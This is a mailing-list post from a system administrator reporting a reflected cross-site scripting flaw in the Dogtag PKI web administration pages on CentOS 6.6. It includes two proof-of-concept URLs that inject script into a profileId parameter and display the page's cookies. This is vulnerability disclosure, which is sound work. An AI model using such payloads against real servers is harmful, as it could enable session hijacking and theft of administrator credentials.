[Pki-users] XSS attacks on the web administration page (port 9180, port 9444)
Thibaut Pouzet
thibaut.pouzet at lyra-network.com
Wed May 6 12:58:15 UTC 2015
Hi,
We are using the dogtag PKI tool packaged through IPA on CentOS 6.6,
here are the system information :
* pki-ca-9.0.3-38.el6_6.noarch
* pki-setup-9.0.3-38.el6_6.noarch
$ uname -a
Linux ipa_server 2.6.32-504.12.2.el6.x86_64 #1 SMP Wed Mar 11 22:03:14
UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/redhat-release
CentOS release 6.6 (Final)
It appears that the administation page is vulnerable to XSS attacks,
wether through the SSL administration page, or the non-SSL
administration page. Here is the PoC :
*
http://ipa_server:9180/ca/ee/ca/profileSelect?profileId=plop%3C/script%3E%3Cscript%3Evar%20x=document.cookie;alert%28x%29;//
*
https://ipa_server:9444/ca/ee/ca/profileSelect?profileId=plop%3C/script%3E%3Cscript%3Evar%20x=document.cookie;alert%28x%29;//
I cannot seem to find any trace of this problem on google, am I missing
something ? Is it the same for other people ?
Cheers,
--
Thibaut Pouzet
Lyra Network
Ingénieur Systèmes et Réseaux
(+33) 5 31 22 40 08
www.lyra-network.com
More information about the Pki-users
mailing list